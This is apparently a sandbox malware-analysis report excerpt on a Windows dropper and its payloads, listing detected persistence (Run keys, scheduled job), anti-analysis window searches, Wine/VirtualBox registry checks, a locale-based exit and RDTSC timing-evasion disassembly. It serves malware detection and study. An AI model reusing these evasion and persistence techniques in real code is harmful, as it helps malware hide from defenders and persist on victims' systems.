Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Creates job files (autostart)
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48f0ec6733.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 48f0ec6733.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee7a49fbf0.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ee7a49fbf0.exe
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\1000003002\ee7a49fbf0.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking locale)
Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\RoamingIJDGCAEBFI.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 7BF1E2 second address: 7BEA92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC319h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F5828CEC315h 0x00000010 jmp 00007F5828CEC30Fh 0x00000015 nop 0x00000016 jmp 00007F5828CEC317h 0x0000001b push dword ptr [ebp+122D1685h] 0x00000021 jno 00007F5828CEC30Ch 0x00000027 call dword ptr [ebp+122D389Ah] 0x0000002d pushad 0x0000002e jns 00007F5828CEC31Dh 0x00000034 xor eax, eax 0x00000036 add dword ptr [ebp+122D1A4Ch], ecx 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 pushad 0x00000041 mov dword ptr [ebp+122D1EFAh], edi 0x00000047 popad 0x00000048 mov dword ptr [ebp+122D29CCh], eax 0x0000004e js 00007F5828CEC312h 0x00000054 js 00007F5828CEC30Ch 0x0000005a sub dword ptr [ebp+122D1D98h], esi 0x00000060 sub dword ptr [ebp+122D1F2Ch], ecx 0x00000066 mov esi, 0000003Ch 0x0000006b cld 0x0000006c add esi, dword ptr [esp+24h] 0x00000070 mov dword ptr [ebp+122D1A4Ch], esi 0x00000076 lodsw 0x00000078 jmp 00007F5828CEC318h 0x0000007d add eax, dword ptr [esp+24h] 0x00000081 clc 0x00000082 mov ebx, dword ptr [esp+24h] 0x00000086 stc 0x00000087 push eax 0x00000088 push esi 0x00000089 push eax 0x0000008a push edx 0x0000008b pushad 0x0000008c popad 0x0000008d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 7BEA92 second address: 7BEA96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 9326FE second address: 93270E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F5828CEC306h 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 93270E second address: 932718 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5828704A66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932859 second address: 932862 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932862 second address: 932868 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932868 second address: 93286D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932C31 second address: 932C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 js 00007F5828704A66h 0x0000000b jl 00007F5828704A66h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 jmp 00007F5828704A6Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5828704A76h 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932C69 second address: 932C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 932C6D second address: 932C73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935CC9 second address: 935CDB instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F5828CEC306h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935CDB second address: 935D9B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov dword ptr [ebp+122D381Dh], ebx 0x00000014 push 00000000h 0x00000016 mov esi, dword ptr [ebp+122D2838h] 0x0000001c push AC4A6A3Fh 0x00000021 jg 00007F5828704A77h 0x00000027 jmp 00007F5828704A71h 0x0000002c add dword ptr [esp], 53B59641h 0x00000033 push 00000000h 0x00000035 push ecx 0x00000036 call 00007F5828704A68h 0x0000003b pop ecx 0x0000003c mov dword ptr [esp+04h], ecx 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc ecx 0x00000049 push ecx 0x0000004a ret 0x0000004b pop ecx 0x0000004c ret 0x0000004d stc 0x0000004e push 00000003h 0x00000050 jmp 00007F5828704A75h 0x00000055 push 00000000h 0x00000057 xor dword ptr [ebp+122D1F2Ch], edx 0x0000005d push 00000003h 0x0000005f mov ecx, dword ptr [ebp+122D28F4h] 0x00000065 push D4A09635h 0x0000006a push esi 0x0000006b jmp 00007F5828704A74h 0x00000070 pop esi 0x00000071 xor dword ptr [esp], 14A09635h 0x00000078 mov edi, dword ptr [ebp+122D2940h] 0x0000007e lea ebx, dword ptr [ebp+1244AB95h] 0x00000084 sub cl, 0000002Ah 0x00000087 xchg eax, ebx 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b push edx 0x0000008c pushad 0x0000008d popad 0x0000008e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935D9B second address: 935D9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935D9F second address: 935DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935EC0 second address: 935EC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935EC4 second address: 935EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b je 00007F5828704A72h 0x00000011 jo 00007F5828704A6Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935EDD second address: 935EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [eax] 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F5828CEC306h 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935EEC second address: 935F14 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5828704A74h 0x0000000b popad 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 je 00007F5828704A74h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935F14 second address: 935F1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe RDTSC instruction interceptor: First address: 935F1A second address: 935F65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov dl, bh 0x00000008 push 00000003h 0x0000000a push 00000000h 0x0000000c mov edx, 3EB584ABh 0x00000011 jo 00007F5828704A7Fh 0x00000017 call 00007F5828704A76h 0x0000001c push esi 0x0000001d pop esi 0x0000001e pop edx 0x0000001f push 00000003h 0x00000021 push 83C34CDFh 0x00000026 pushad 0x00000027 jmp 00007F5828704A6Fh 0x0000002c push eax 0x0000002d push edx 0x0000002e push ecx 0x0000002f pop ecx 0x00000030 rdtsc
